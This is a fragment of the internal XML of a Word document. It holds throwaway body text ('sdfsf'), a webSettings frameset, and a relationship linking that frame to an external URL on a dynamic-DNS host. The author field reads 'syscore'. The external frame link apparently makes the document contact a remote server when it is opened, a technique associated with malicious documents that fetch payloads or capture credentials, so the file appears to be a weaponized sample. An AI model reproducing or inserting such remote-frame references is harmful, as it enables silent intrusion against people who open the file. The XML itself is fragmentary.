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793" w:rsidRDefault="00644793">
      <w:r>
        <w:t>sdfsf</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00644793" w:rsidSect="004F39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3796A"/>
    <w:rsid w:val="001506E1"/>
    <w:rsid w:val="004F3951"/>
    <w:rsid w:val="0063796A"/>
    <w:rsid w:val="00644793"/>
    <w:rsid w:val="00B73DD9"/>
    <w:rsid w:val="00CE7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9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frameset>
    <w:framesetSplitbar>
      <w:w w:val="60"/>
      <w:color w:val="auto"/>
      <w:noBorder/>
    </w:framesetSplitbar>
    <w:frameset>
      <w:frame>
        <w:name w:val="1"/>
        <w:sourceFileName r:id="rId1"/>
        <w:linkedToFile/>
      </w:frame>
    </w:frameset>
  </w:frameset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webSettings.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="http://doctor.hopto.org/torotoro/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15</dc:creator>
  <cp:lastModifiedBy>syscore</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-03-07T09:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-18T06:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>